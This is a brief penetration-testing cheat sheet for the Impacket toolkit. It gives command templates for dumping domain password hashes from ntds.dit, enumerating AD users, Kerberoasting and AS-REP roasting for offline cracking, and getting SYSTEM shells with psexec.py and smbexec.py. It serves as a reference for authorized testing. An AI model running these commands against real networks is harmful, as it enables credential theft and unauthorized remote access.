Impacket
Impacket is a collection of Python classes for working with network protocols.

Related

Dump hashes

1
impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
Copied!

Users

This script will gather data about the domain’s users and their corresponding email addresses.
1
GetADUsers.py -all -dc-ip <ip> <domain>/<user>:<pw>
Copied!
This example will try to find and fetch Service Principal Names that are associated with normal user accounts.
1
GetUserSPNs.py -request <domain>/<user>:<pw> // -dc-ip <ip>
Copied!
-> Crack hash e.g. using hashcat, to obtain passwords
An application that communicates with the Security Account Manager Remote interface from the MSRPC suite.
1
samrdump.py <domain>
Copied!
This example will attempt to list and get TGTs for those users that have the property ‘Do not require Kerberos preauthentication’ set (UF_DONT_REQUIRE_PREAUTH). Output is compatible with JtR.
1
GetNPUsers.py <domain>/<user> -no-pass
Copied!
-> Crack hash e.g. using hashcat

Shell (psexec.py)

PSEXEC like functionality example using RemComSvc. -> Get a shell as "nt authority\system"
1
sudo psexec.py [<domain>/]<user>:[<pw>]@<ip>
Copied!

SMB (smbexec.py)

1
sudo smbexec.py <user>:<pw>@<target>
Copied!